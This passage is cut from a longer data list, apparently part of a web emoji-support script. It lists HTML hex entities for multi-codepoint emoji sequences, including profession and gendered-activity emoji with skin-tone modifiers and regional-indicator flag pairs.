'&#x1f468;&#x1f3ff;&#x200d;&#x1f3eb;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f3ed;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f4bb;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f4bc;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f527;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f52c;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f680;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f692;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f9af;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f9b0;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f9b1;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f9b2;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f9b3;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f9bc;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f9bd;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f33e;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f373;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f37c;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f384;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f393;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f3a4;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f3a8;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f3eb;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f3ed;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f4bb;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f4bc;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f527;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f52c;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f680;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f692;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f9af;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f9b0;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f9b1;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f9b2;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f9b3;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f9bc;', '&#x1f469;&#x1f3fb;&#x200d;&#x1f9bd;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f33e;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f373;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f37c;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f384;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f393;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f3a4;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f3a8;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f3eb;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f3ed;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f4bb;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f4bc;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f527;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f52c;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f680;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f692;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f9af;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f9b0;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f9b1;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f9b2;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f9b3;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f9bc;', '&#x1f469;&#x1f3fc;&#x200d;&#x1f9bd;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f33e;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f373;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f37c;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f384;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f393;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f3a4;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f3a8;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f3eb;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f3ed;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f4bb;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f4bc;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f527;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f52c;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f680;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f692;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f9af;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f9b0;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f9b1;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f9b2;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f9b3;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f9bc;', '&#x1f469;&#x1f3fd;&#x200d;&#x1f9bd;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f33e;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f373;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f37c;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f384;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f393;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f3a4;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f3a8;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f3eb;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f3ed;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f4bb;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f4bc;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f527;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f52c;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f680;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f692;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f9af;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f9b0;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f9b1;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f9b2;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f9b3;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f9bc;', '&#x1f469;&#x1f3fe;&#x200d;&#x1f9bd;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f33e;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f373;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f37c;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f384;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f393;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f3a4;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f3a8;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f3eb;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f3ed;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f4bb;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f4bc;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f527;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f52c;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f680;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f692;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f9af;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f9b0;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f9b1;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f9b2;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f9b3;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f9bc;', '&#x1f469;&#x1f3ff;&#x200d;&#x1f9bd;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f33e;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f373;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f37c;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f384;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f393;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f3a4;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f3a8;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f3eb;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f3ed;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f4bb;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f4bc;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f527;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f52c;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f680;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f692;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f9af;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f9b0;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f9b1;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f9b2;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f9b3;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f9bc;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x1f9bd;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f33e;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f373;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f37c;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f384;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f393;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f3a4;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f3a8;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f3eb;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f3ed;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f4bb;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f4bc;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f527;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f52c;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f680;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f692;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f9af;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f9b0;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f9b1;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f9b2;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f9b3;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f9bc;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x1f9bd;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f33e;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f373;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f37c;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f384;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f393;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f3a4;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f3a8;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f3eb;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f3ed;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f4bb;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f4bc;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f527;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f52c;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f680;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f692;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f9af;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f9b0;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f9b1;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f9b2;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f9b3;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f9bc;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x1f9bd;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f33e;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f373;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f37c;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f384;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f393;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f3a4;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f3a8;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f3eb;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f3ed;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f4bb;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f4bc;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f527;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f52c;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f680;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f692;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f9af;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f9b0;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f9b1;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f9b2;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f9b3;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f9bc;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x1f9bd;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f33e;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f373;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f37c;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f384;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f393;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f3a4;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f3a8;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f3eb;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f3ed;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f4bb;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f4bc;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f527;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f52c;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f680;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f692;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f9af;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f9b0;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f9b1;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f9b2;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f9b3;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f9bc;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x1f9bd;', '&#x1f3f3;&#xfe0f;&#x200d;&#x1f308;', '&#x1f636;&#x200d;&#x1f32b;&#xfe0f;', '&#x1f3c3;&#x200d;&#x2640;&#xfe0f;', '&#x1f3c3;&#x200d;&#x2642;&#xfe0f;', '&#x1f3c4;&#x200d;&#x2640;&#xfe0f;', '&#x1f3c4;&#x200d;&#x2642;&#xfe0f;', '&#x1f3ca;&#x200d;&#x2640;&#xfe0f;', '&#x1f3ca;&#x200d;&#x2642;&#xfe0f;', '&#x1f3f4;&#x200d;&#x2620;&#xfe0f;', '&#x1f43b;&#x200d;&#x2744;&#xfe0f;', '&#x1f468;&#x200d;&#x2695;&#xfe0f;', '&#x1f468;&#x200d;&#x2696;&#xfe0f;', '&#x1f468;&#x200d;&#x2708;&#xfe0f;', '&#x1f469;&#x200d;&#x2695;&#xfe0f;', '&#x1f469;&#x200d;&#x2696;&#xfe0f;', '&#x1f469;&#x200d;&#x2708;&#xfe0f;', '&#x1f46e;&#x200d;&#x2640;&#xfe0f;', '&#x1f46e;&#x200d;&#x2642;&#xfe0f;', '&#x1f46f;&#x200d;&#x2640;&#xfe0f;', '&#x1f46f;&#x200d;&#x2642;&#xfe0f;', '&#x1f470;&#x200d;&#x2640;&#xfe0f;', '&#x1f470;&#x200d;&#x2642;&#xfe0f;', '&#x1f471;&#x200d;&#x2640;&#xfe0f;', '&#x1f471;&#x200d;&#x2642;&#xfe0f;', '&#x1f473;&#x200d;&#x2640;&#xfe0f;', '&#x1f473;&#x200d;&#x2642;&#xfe0f;', '&#x1f477;&#x200d;&#x2640;&#xfe0f;', '&#x1f477;&#x200d;&#x2642;&#xfe0f;', '&#x1f481;&#x200d;&#x2640;&#xfe0f;', '&#x1f481;&#x200d;&#x2642;&#xfe0f;', '&#x1f482;&#x200d;&#x2640;&#xfe0f;', '&#x1f482;&#x200d;&#x2642;&#xfe0f;', '&#x1f486;&#x200d;&#x2640;&#xfe0f;', '&#x1f486;&#x200d;&#x2642;&#xfe0f;', '&#x1f487;&#x200d;&#x2640;&#xfe0f;', '&#x1f487;&#x200d;&#x2642;&#xfe0f;', '&#x1f645;&#x200d;&#x2640;&#xfe0f;', '&#x1f645;&#x200d;&#x2642;&#xfe0f;', '&#x1f646;&#x200d;&#x2640;&#xfe0f;', '&#x1f646;&#x200d;&#x2642;&#xfe0f;', '&#x1f647;&#x200d;&#x2640;&#xfe0f;', '&#x1f647;&#x200d;&#x2642;&#xfe0f;', '&#x1f64b;&#x200d;&#x2640;&#xfe0f;', '&#x1f64b;&#x200d;&#x2642;&#xfe0f;', '&#x1f64d;&#x200d;&#x2640;&#xfe0f;', '&#x1f64d;&#x200d;&#x2642;&#xfe0f;', '&#x1f64e;&#x200d;&#x2640;&#xfe0f;', '&#x1f64e;&#x200d;&#x2642;&#xfe0f;', '&#x1f6a3;&#x200d;&#x2640;&#xfe0f;', '&#x1f6a3;&#x200d;&#x2642;&#xfe0f;', '&#x1f6b4;&#x200d;&#x2640;&#xfe0f;', '&#x1f6b4;&#x200d;&#x2642;&#xfe0f;', '&#x1f6b5;&#x200d;&#x2640;&#xfe0f;', '&#x1f6b5;&#x200d;&#x2642;&#xfe0f;', '&#x1f6b6;&#x200d;&#x2640;&#xfe0f;', '&#x1f6b6;&#x200d;&#x2642;&#xfe0f;', '&#x1f926;&#x200d;&#x2640;&#xfe0f;', '&#x1f926;&#x200d;&#x2642;&#xfe0f;', '&#x1f935;&#x200d;&#x2640;&#xfe0f;', '&#x1f935;&#x200d;&#x2642;&#xfe0f;', '&#x1f937;&#x200d;&#x2640;&#xfe0f;', '&#x1f937;&#x200d;&#x2642;&#xfe0f;', '&#x1f938;&#x200d;&#x2640;&#xfe0f;', '&#x1f938;&#x200d;&#x2642;&#xfe0f;', '&#x1f939;&#x200d;&#x2640;&#xfe0f;', '&#x1f939;&#x200d;&#x2642;&#xfe0f;', '&#x1f93c;&#x200d;&#x2640;&#xfe0f;', '&#x1f93c;&#x200d;&#x2642;&#xfe0f;', '&#x1f93d;&#x200d;&#x2640;&#xfe0f;', '&#x1f93d;&#x200d;&#x2642;&#xfe0f;', '&#x1f93e;&#x200d;&#x2640;&#xfe0f;', '&#x1f93e;&#x200d;&#x2642;&#xfe0f;', '&#x1f9b8;&#x200d;&#x2640;&#xfe0f;', '&#x1f9b8;&#x200d;&#x2642;&#xfe0f;', '&#x1f9b9;&#x200d;&#x2640;&#xfe0f;', '&#x1f9b9;&#x200d;&#x2642;&#xfe0f;', '&#x1f9cd;&#x200d;&#x2640;&#xfe0f;', '&#x1f9cd;&#x200d;&#x2642;&#xfe0f;', '&#x1f9ce;&#x200d;&#x2640;&#xfe0f;', '&#x1f9ce;&#x200d;&#x2642;&#xfe0f;', '&#x1f9cf;&#x200d;&#x2640;&#xfe0f;', '&#x1f9cf;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d1;&#x200d;&#x2695;&#xfe0f;', '&#x1f9d1;&#x200d;&#x2696;&#xfe0f;', '&#x1f9d1;&#x200d;&#x2708;&#xfe0f;', '&#x1f9d4;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d4;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d6;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d6;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d7;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d7;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d8;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d8;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d9;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d9;&#x200d;&#x2642;&#xfe0f;', '&#x1f9da;&#x200d;&#x2640;&#xfe0f;', '&#x1f9da;&#x200d;&#x2642;&#xfe0f;', '&#x1f9db;&#x200d;&#x2640;&#xfe0f;', '&#x1f9db;&#x200d;&#x2642;&#xfe0f;', '&#x1f9dc;&#x200d;&#x2640;&#xfe0f;', '&#x1f9dc;&#x200d;&#x2642;&#xfe0f;', '&#x1f9dd;&#x200d;&#x2640;&#xfe0f;', '&#x1f9dd;&#x200d;&#x2642;&#xfe0f;', '&#x1f9de;&#x200d;&#x2640;&#xfe0f;', '&#x1f9de;&#x200d;&#x2642;&#xfe0f;', '&#x1f9df;&#x200d;&#x2640;&#xfe0f;', '&#x1f9df;&#x200d;&#x2642;&#xfe0f;', '&#x2764;&#xfe0f;&#x200d;&#x1f525;', '&#x2764;&#xfe0f;&#x200d;&#x1fa79;', '&#x1f415;&#x200d;&#x1f9ba;', '&#x1f441;&#x200d;&#x1f5e8;', '&#x1f468;&#x200d;&#x1f33e;', '&#x1f468;&#x200d;&#x1f373;', '&#x1f468;&#x200d;&#x1f37c;', '&#x1f468;&#x200d;&#x1f384;', '&#x1f468;&#x200d;&#x1f393;', '&#x1f468;&#x200d;&#x1f3a4;', '&#x1f468;&#x200d;&#x1f3a8;', '&#x1f468;&#x200d;&#x1f3eb;', '&#x1f468;&#x200d;&#x1f3ed;', '&#x1f468;&#x200d;&#x1f466;', '&#x1f468;&#x200d;&#x1f467;', '&#x1f468;&#x200d;&#x1f4bb;', '&#x1f468;&#x200d;&#x1f4bc;', '&#x1f468;&#x200d;&#x1f527;', '&#x1f468;&#x200d;&#x1f52c;', '&#x1f468;&#x200d;&#x1f680;', '&#x1f468;&#x200d;&#x1f692;', '&#x1f468;&#x200d;&#x1f9af;', '&#x1f468;&#x200d;&#x1f9b0;', '&#x1f468;&#x200d;&#x1f9b1;', '&#x1f468;&#x200d;&#x1f9b2;', '&#x1f468;&#x200d;&#x1f9b3;', '&#x1f468;&#x200d;&#x1f9bc;', '&#x1f468;&#x200d;&#x1f9bd;', '&#x1f469;&#x200d;&#x1f33e;', '&#x1f469;&#x200d;&#x1f373;', '&#x1f469;&#x200d;&#x1f37c;', '&#x1f469;&#x200d;&#x1f384;', '&#x1f469;&#x200d;&#x1f393;', '&#x1f469;&#x200d;&#x1f3a4;', '&#x1f469;&#x200d;&#x1f3a8;', '&#x1f469;&#x200d;&#x1f3eb;', '&#x1f469;&#x200d;&#x1f3ed;', '&#x1f469;&#x200d;&#x1f466;', '&#x1f469;&#x200d;&#x1f467;', '&#x1f469;&#x200d;&#x1f4bb;', '&#x1f469;&#x200d;&#x1f4bc;', '&#x1f469;&#x200d;&#x1f527;', '&#x1f469;&#x200d;&#x1f52c;', '&#x1f469;&#x200d;&#x1f680;', '&#x1f469;&#x200d;&#x1f692;', '&#x1f469;&#x200d;&#x1f9af;', '&#x1f469;&#x200d;&#x1f9b0;', '&#x1f469;&#x200d;&#x1f9b1;', '&#x1f469;&#x200d;&#x1f9b2;', '&#x1f469;&#x200d;&#x1f9b3;', '&#x1f469;&#x200d;&#x1f9bc;', '&#x1f469;&#x200d;&#x1f9bd;', '&#x1f62e;&#x200d;&#x1f4a8;', '&#x1f635;&#x200d;&#x1f4ab;', '&#x1f9d1;&#x200d;&#x1f33e;', '&#x1f9d1;&#x200d;&#x1f373;', '&#x1f9d1;&#x200d;&#x1f37c;', '&#x1f9d1;&#x200d;&#x1f384;', '&#x1f9d1;&#x200d;&#x1f393;', '&#x1f9d1;&#x200d;&#x1f3a4;', '&#x1f9d1;&#x200d;&#x1f3a8;', '&#x1f9d1;&#x200d;&#x1f3eb;', '&#x1f9d1;&#x200d;&#x1f3ed;', '&#x1f9d1;&#x200d;&#x1f4bb;', '&#x1f9d1;&#x200d;&#x1f4bc;', '&#x1f9d1;&#x200d;&#x1f527;', '&#x1f9d1;&#x200d;&#x1f52c;', '&#x1f9d1;&#x200d;&#x1f680;', '&#x1f9d1;&#x200d;&#x1f692;', '&#x1f9d1;&#x200d;&#x1f9af;', '&#x1f9d1;&#x200d;&#x1f9b0;', '&#x1f9d1;&#x200d;&#x1f9b1;', '&#x1f9d1;&#x200d;&#x1f9b2;', '&#x1f9d1;&#x200d;&#x1f9b3;', '&#x1f9d1;&#x200d;&#x1f9bc;', '&#x1f9d1;&#x200d;&#x1f9bd;', '&#x1f408;&#x200d;&#x2b1b;', '&#x1f426;&#x200d;&#x2b1b;', '&#x1f1e6;&#x1f1e8;', '&#x1f1e6;&#x1f1e9;', '&#x1f1e6;&#x1f1ea;', '&#x1f1e6;&#x1f1eb;', '&#x1f1e6;&#x1f1ec;', '&#x1f1e6;&#x1f1ee;', '&#x1f1e6;&#x1f1f1;', '&#x1f1e6;&#x1f1f2;', '&#x1f1e6;&#x1f1f4;', '&#x1f1e6;&#x1f1f6;', '&#x1f1e6;&#x1f1f7;', '&#x1f1e6;&#x1f1f8;', '&#x1f1e6;&#x1f1f9;', '&#x1f1e6;&#x1f1fa;', '&#x1f1e6;&#x1f1fc;', '&#x1f1e6;&#x1f1fd;', '&#x1f1e6;&#x1f1ff;', '&#x1f1e7;&#x1f1e6;', '&#x1f1e7;&#x1f1e7;', '&#x1f1e7;&#x1f1e9;', '&#x1f1e7;&#x1f1ea;', '&#x1f1e7;&#x1f1eb;', '&#x1f1e7;&#x1f1ec;', '&#x1f1e7;&#x1f1ed;', '&#x1f1e7;&#x1f1ee;', '&#x1f1e7;&#x1f1ef;', '&#x1f1e7;&#x1f1f1;', '&#x1f1e7;&#x1f1f2;', '&#x1f1e7;&#x1f1f3;', '&#x1f1e7;&#x1f1f4;', '&#x1f1e7;&#x1f1f6;', '&#x1f1e7;&#x1f1f7;', '&#x1f1e7;&#x1f1f8;', '&#x1f1e7;&#x1f1f9;', '&#x1f1e7;&#x1f1fb;', '&#x1f1e7;&#x1f1fc;', '&#x1f1e7;&#x1f1fe;', '&#x1f1e7;&#x1f1ff;', '&#x1f1e8;&#x1f1e6;', '&#x1f1e8;&#x1f1e8;', '&#x1f1e8;&#x1f1e9;', '&#x1f1e8;&#x1f1eb;', '&#x1f1e8;&#x1f1ec;', '&#x1f1e8;&#x1f1ed;', '&#x1f1e8;&#x1f1ee;', '&#x1f1e8;&#x1f1f0;', '&#x1f1e8;&#x1f1f1;', '&#x1f1e8;&#x1f1f2;', '&#x1f1e8;&#x1f1f3;', '&#x1f1e8;&#x1f1f4;', '&#x1f1e8;&#x1f1f5;', '&#x1f1e8;&#x1f1f7;', '&#x1f1e8;&#x1f1fa;', '&#x1f1e8;&#x1f1fb;', '&#x1f1e8;&#x1f1fc;', '&#x1f1e8;&#x1f1fd;', '&#x1f1e8;&#x1f1fe;', '&#x1f1e8;&#x1f1ff;', '&#x1f1e9;&#x1f1ea;', '&#x1f1e9;&#x1f1ec;', '&#x1f1e9;&#x1f1ef;', '&#x1f1e9;&#x1f1f0;', '&#x1f1e9;&#x1f1f2;', '&#x1f1e9;&#x1f1f4;', '&#x1f1e9;&#x1f1ff;', '&#x1f1ea;&#x1f1e6;', '&#x1f1ea;&#x1f1e8;', '&#x1f1ea;&#x1f1ea;', '&#x1f1ea;&#x1f1ec;', '&#x1f1ea;&#x1f1ed;', '&#x1f1ea;&#x1f1f7;', '&#x1f1ea;&#x1f1f8;', '&#x1f1ea;&#x1f1f9;', '&#x1f1ea;&#x1f1fa;', '&#x1f1eb;&#x1f1ee;', '&#x1f1eb;&#x1f1ef;', '&#x1f1eb;&#x1f1f0;', '&#x1f1eb;&#x1f1f2;', '&#x1f1eb;&#x1f1f4;', '&#x1f1eb;&#x1f1f7;', '&#x1f1ec;&#x1f1e6;', '&#x1f1ec;&#x1f1e7;', '&#x1f1ec;&#x1f1e9;', '&#x1f1ec;&#x1f1ea;', '&#x1f1ec;&#x1f1eb;', '&#x1f1ec;&#x1f1ec;', '&#x1f1ec;&#x1f1ed;', '&#x1f1ec;&#x1f1ee;', '&#x1f1ec;&#x1f1f1;', '&#x1f1ec;&#x1f1f2;', '&#x1f1ec;&#x1f1f3;', '&#x1f1ec;&#x1f1f5;', '&#x1f1ec;&#x1f1f6;', '&#x1f1ec;&#x1f1f7;', '&#x1f1ec;&#x1f1f8;', '&#x1f1ec;&#x1f1f9;', '&#x1f1ec;&#x1f1fa;', '&#x1f1ec;&#x1f1fc;', '&#x1f1ec;&#x1f1fe;', '&#x1f1ed;&#x1f1f0;', '&#x1f1ed;&#x1f1f2;', '&#x1f1ed;&#x1f1f3;', '&#x1f1ed;&#x1f1f7;', '&#x1f1ed;&#x1f1f9;', '&#x1f1ed;&#x1f1fa;', 